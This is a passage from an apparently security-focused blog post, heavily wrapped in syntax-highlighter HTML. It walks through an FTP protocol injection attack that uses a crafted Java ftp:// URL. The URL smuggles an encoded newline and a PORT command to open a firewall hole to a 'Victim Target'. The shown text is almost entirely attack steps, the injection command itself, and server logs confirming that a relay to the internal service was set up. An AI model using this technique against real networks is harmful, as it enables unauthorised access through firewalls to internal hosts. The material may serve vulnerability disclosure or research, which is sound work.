class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt; &#8212;  Connection received from 8.14.14.15:37436.  &gt;&gt; USER x  &gt;&gt; PASS y  &gt;&gt; TYPE I  &gt;&gt; CWD leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  Payload size appears to be: 536  Try this URL instead:  ftp:\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXX%0APORT%2010,1,2,3,48,57\/z.txt  Closing control channel.  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448605222122713-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448605222122713-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-2\"><span class=\"crayon-e\">Connection <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-i\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.14.14.15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">37436.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-3\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">USER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-4\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PASS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-5\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">TYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">I<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-6\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CWD <\/span><span class=\"crayon-e\">leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-7\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-8\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-9\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-10\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-11\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-12\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-13\"><span class=\"crayon-e\">Payload <\/span><span class=\"crayon-e\">size <\/span><span class=\"crayon-e\">appears <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">536<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-14\"><span class=\"crayon-st\">Try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">instead<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-15\"><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-16\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-17\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-18\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-19\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-20\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-21\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-22\"><span class=\"crayon-v\">XXXX<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">0APORT<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2010<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">57<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">txt<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448605222122713-23\"><span class=\"crayon-e\">Closing <\/span><span class=\"crayon-e\">control <\/span><span class=\"crayon-v\">channel<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448605222122713-24\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>This final URL should be usable going forward for any number of TCP connections you want to initiate to the Victim Target (VT).<\/p>\n<p><u>Step 3: Open the Firewall and Test the Service<\/u><\/p>\n<p>Keep the FTP service running with the same configuration from Step 2. Just do a final fetch to open up the port through the firewall:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448608465025250\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> java fetch ftp:\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXX%0APORT%2010,1,2,3,48,57\/z.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448608465025250-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448608465025250-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448608465025250-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448608465025250-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448608465025250-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448608465025250-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448608465025250-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448608465025250-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448608465025250-1\"><span class=\"crayon-e\">java <\/span><span class=\"crayon-e\">fetch <\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448608465025250-2\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448608465025250-3\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448608465025250-4\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448608465025250-5\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448608465025250-6\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448608465025250-7\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448608465025250-8\"><span class=\"crayon-v\">XXX<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">0APORT<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2010<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">57<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">z<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>This should cause the FTP service to response something like this:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce44860b258195614\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt; &#8212;  Connection received from 8.14.14.15:37474.  &gt;&gt; USER x  &gt;&gt; PASS y  &gt;&gt; TYPE I  &gt;&gt; CWD leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  Correct padding!  &gt;&gt; PORT 10,1,2,3,48,57  Client has opened 10.1.2.3:12345  Setting up relay on 127.0.0.1:32537; connect to this to access the targeted service  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44860b258195614-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860b258195614-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-2\"><span class=\"crayon-e\">Connection <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-i\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.14.14.15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">37474.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-3\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">USER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-4\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PASS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-5\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">TYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">I<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-6\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CWD <\/span><span class=\"crayon-e\">leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-7\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div 